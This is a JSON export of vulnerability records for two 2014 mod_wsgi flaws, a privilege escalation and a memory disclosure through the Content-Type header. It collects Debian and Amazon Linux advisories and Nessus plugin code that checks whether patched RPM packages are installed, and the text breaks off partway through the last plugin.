"securityvulns": [{"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "Privilege escalation, information disclosure.", "edition": 1, "modified": "2014-05-29T00:00:00", "published": "2014-05-29T00:00:00", "id": "SECURITYVULNS:VULN:13787", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13787", "title": "mod-wsgi security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2937-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nMay 27, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mod-wsgi\r\nCVE ID : CVE-2014-0240 CVE-2014-0242\r\n\r\nTwo security issues have been found in the Python WSGI adapter module \r\nfor Apache:\r\n\r\nCVE-2014-0240\r\n\r\n Robert Kisteleki discovered a potential privilege escalation in\r\n daemon mode. This is not exploitable with the kernel used in Debian\r\n 7.0/wheezy.\r\n\r\nCVE-2014-0242\r\n\r\n Buck Golemon discovered that incorect memory handling could lead to\r\n information disclosure when processing Content-Type headers.\r\n\r\nFor the oldstable distribution (squeeze), these problems have been fixed in\r\nversion 3.3-2+deb6u1.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 3.3-4+deb7u1.\r\n\r\nFor the testing distribution (jessie), these problems have been fixed in\r\nversion 3.5-1.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 3.5-1.\r\n\r\nWe recommend that you upgrade your mod-wsgi packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJThKJYAAoJEBDCk7bDfE42pQAP/1timmRSoJfdYXoYM/3wCeTH\r\nCQGd9/4TmKeZc7bzWeaQfsLYfWgeicS+y3hPuZBMKdr4jX0r40AQ9j2zhiHG+WvM\r\njkpiLfuhvPpRY45Umll4xwRdfORpAr2ZN/H8ebohBOF6PAY4XZfr4tl0AgzqLPc+\r\ns9wvff5vlDI5QBWuqWpXm4NXKlRtANqeTlPK3fvJJecJn74shv1PHpRqAVZzUA4J\r\nKYaVrnIZFz5FQm8X2n+1VeAPaZb+UU/otqKdqkUit9lcld2nB6Zq1cqiFGO2sNVU\r\nzO3aIj/nsrCJwIS2+3GhNAbjVbh9nz1c3ZAg0WFBr0CbrIHrA7mLIuHW3XYfXPKS\r\nvF5JDxf6lnpRaJEEyoVUosm2fk3x/W8D91v4m1u92rgRSUF14nAv9XX745t8aZHn\r\nVhzwFCwbaZgy0R2GbThs6rdAkVcKWNucCCX6WrjuEbp0HHCq8yEw7nkjCGY3lMj7\r\nkRB6wm6iRcDIQCmClbLys/7Oq952TV6kLEs9XpD+rsyrHalkxqU/IZOhjwznLE3r\r\nrCVZMrzlUPupgob2xnBc/688LnMIcq/UQkJCMqCHo7ER+lvVLoAc9o4yvMF76JSC\r\nZrbromVm51ZMFRuFD6kDjQFxrYBYt/QVAGeRrGCHkES8nm8l0x2g0QS61KXBh8V9\r\ny+bcSiwTu8URJpnL32Ub\r\n=wcoD\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-29T00:00:00", "published": "2014-05-29T00:00:00", "id": "SECURITYVULNS:DOC:30761", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30761", "title": "[SECURITY] [DSA 2937-1] mod-wsgi security update", "type": "securityvulns", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "**Issue Overview:**\n\nIt was found that mod_wsgi did not properly drop privileges if the call to setuid() failed. If mod_wsgi was set up to allow unprivileged users to run WSGI applications, a local user able to run a WSGI application could possibly use this flaw to escalate their privileges on the system. Note: mod_wsgi is not intended to provide privilege separation for WSGI applications. Systems relying on mod_wsgi to limit or sandbox the privileges of mod_wsgi applications should migrate to a different solution with proper privilege separation. \n\nmod_wsgi allows you to host Python applications on the Apache HTTP Server. It was found that a remote attacker could leak portions of a mod_wsgi application's memory via the Content-Type header.\n\n \n**Affected Packages:** \n\n\nmod24_wsgi\n\n \n**Issue Correction:** \nRun _yum update mod24_wsgi_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod24_wsgi-3.5-1.17.amzn1.i686 \n mod24_wsgi-debuginfo-3.5-1.17.amzn1.i686 \n mod24_wsgi-py27-3.5-1.17.amzn1.i686 \n \n src: \n mod24_wsgi-3.5-1.17.amzn1.src \n \n x86_64: \n mod24_wsgi-py27-3.5-1.17.amzn1.x86_64 \n mod24_wsgi-3.5-1.17.amzn1.x86_64 \n mod24_wsgi-debuginfo-3.5-1.17.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T23:02:00", "published": "2014-07-09T23:02:00", "id": "ALAS-2014-375", "href": "https://alas.aws.amazon.com/ALAS-2014-375.html", "title": "Important: mod24_wsgi", "type": "amazon", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-10T12:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "**Issue Overview:**\n\nIt was found that mod_wsgi did not properly drop privileges if the call to setuid() failed. If mod_wsgi was set up to allow unprivileged users to run WSGI applications, a local user able to run a WSGI application could possibly use this flaw to escalate their privileges on the system. Note: mod_wsgi is not intended to provide privilege separation for WSGI applications. Systems relying on mod_wsgi to limit or sandbox the privileges of mod_wsgi applications should migrate to a different solution with proper privilege separation.\n\nmod_wsgi allows you to host Python applications on the Apache HTTP Server. It was found that a remote attacker could leak portions of a mod_wsgi application's memory via the Content-Type header.\n\n \n**Affected Packages:** \n\n\nmod_wsgi\n\n \n**Issue Correction:** \nRun _yum update mod_wsgi_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n mod_wsgi-debuginfo-3.2-6.8.amzn1.i686 \n mod_wsgi-3.2-6.8.amzn1.i686 \n \n src: \n mod_wsgi-3.2-6.8.amzn1.src \n \n x86_64: \n mod_wsgi-debuginfo-3.2-6.8.amzn1.x86_64 \n mod_wsgi-3.2-6.8.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2014-07-09T23:07:00", "published": "2014-07-09T23:07:00", "id": "ALAS-2014-376", "href": "https://alas.aws.amazon.com/ALAS-2014-376.html", "title": "Important: mod_wsgi", "type": "amazon", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:12:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2937-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMay 27, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mod-wsgi\nCVE ID : CVE-2014-0240 CVE-2014-0242\n\nTwo security issues have been found in the Python WSGI adapter module \nfor Apache:\n\nCVE-2014-0240\n\n Robert Kisteleki discovered a potential privilege escalation in\n daemon mode. This is not exploitable with the kernel used in Debian\n 7.0/wheezy.\n\nCVE-2014-0242\n\n Buck Golemon discovered that incorect memory handling could lead to\n information disclosure when processing Content-Type headers.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.3-2+deb6u1.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.3-4+deb7u1.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 3.5-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.5-1.\n\nWe recommend that you upgrade your mod-wsgi packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2014-05-27T14:35:44", "published": "2014-05-27T14:35:44", "id": "DEBIAN:DSA-2937-1:00642", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00118.html", "title": "[SECURITY] [DSA 2937-1] mod-wsgi security update", "type": "debian", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:29:36", "description": "An updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-26T00:00:00", "title": "CentOS 6 : mod_wsgi (CESA-2014:0788)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-26T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:mod_wsgi"], "id": "CENTOS_RHSA-2014-0788.NASL", "href": "https://www.tenable.com/plugins/nessus/76217", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0788 and \n# CentOS Errata and Security Advisory 2014:0788 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76217);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67534);\n script_xref(name:\"RHSA\", value:\"2014:0788\");\n\n script_name(english:\"CentOS 6 : mod_wsgi (CESA-2014:0788)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated mod_wsgi package that fixes two security issues is now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe mod_wsgi adapter is an Apache module that provides a\nWSGI-compliant interface for hosting Python-based web applications\nwithin Apache.\n\nIt was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\n\nRed Hat would like to thank Graham Dumpleton for reporting these\nissues. Upstream acknowledges Robert Kisteleki as the original\nreporter of CVE-2014-0240, and Buck Golemon as the original reporter\nof CVE-2014-0242.\n\nAll mod_wsgi users are advised to upgrade to this updated package,\nwhich contains backported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2014-June/020389.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8dee8e80\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_wsgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0240\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:12:54", "description": "http://modwsgi.readthedocs.org/en/develop/release-notes/version-3.5.ht\nml\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2014-06-18T00:00:00", "title": "Fedora 19 : mod_wsgi-3.5-1.fc19 (2014-6938)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-18T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mod_wsgi", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-6938.NASL", "href": "https://www.tenable.com/plugins/nessus/76095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-6938.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76095);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67932);\n script_xref(name:\"FEDORA\", value:\"2014-6938\");\n\n script_name(english:\"Fedora 19 : mod_wsgi-3.5-1.fc19 (2014-6938)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://modwsgi.readthedocs.org/en/develop/release-notes/version-3.5.ht\nml\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://modwsgi.readthedocs.org/en/develop/release-notes/version-3.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6e385372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1101863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1101873\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134459.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7d6022df\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_wsgi package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mod_wsgi-3.5-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:48:23", "description": "It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)", "edition": 17, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-26T00:00:00", "title": "Scientific Linux Security Update : mod_wsgi on SL6.x i386/srpm/x86_64 (20140625)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-26T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:mod_wsgi-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:mod_wsgi"], "id": "SL_20140625_MOD_WSGI_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/76246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76246);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n\n script_name(english:\"Scientific Linux Security Update : mod_wsgi on SL6.x i386/srpm/x86_64 (20140625)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that mod_wsgi did not properly drop privileges if the\ncall to setuid() failed. If mod_wsgi was set up to allow unprivileged\nusers to run WSGI applications, a local user able to run a WSGI\napplication could possibly use this flaw to escalate their privileges\non the system. (CVE-2014-0240)\n\nNote: mod_wsgi is not intended to provide privilege separation for\nWSGI applications. Systems relying on mod_wsgi to limit or sandbox the\nprivileges of mod_wsgi applications should migrate to a different\nsolution with proper privilege separation.\n\nIt was discovered that mod_wsgi could leak memory of a hosted web\napplication via the 'Content-Type' header. A remote attacker could\npossibly use this flaw to disclose limited portions of the web\napplication's memory. (CVE-2014-0242)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1406&L=scientific-linux-errata&T=0&P=2620\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f86eee0a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mod_wsgi and / or mod_wsgi-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_wsgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mod_wsgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"mod_wsgi-3.2-6.el6_5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_wsgi-debuginfo-3.2-6.el6_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_wsgi / mod_wsgi-debuginfo\");\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:27:44", "description": "apache2-mod_wsgi was updated to fix two security issues.\n\nThese security issues were fixed :\n\n - Information exposure (CVE-2014-0242)\n\n - Local privilege escalation (CVE-2014-0240)", "edition": 18, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-16T00:00:00", "title": "openSUSE Security Update : apache2-mod_wsgi (openSUSE-SU-2014:0782-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0240", "CVE-2014-0242"], "modified": "2014-06-16T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:apache2-mod_wsgi-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_wsgi-debugsource", "p-cpe:/a:novell:opensuse:apache2-mod_wsgi", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-421.NASL", "href": "https://www.tenable.com/plugins/nessus/76069", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-421.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76069);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0240\", \"CVE-2014-0242\");\n script_bugtraq_id(67532, 67534);\n\n 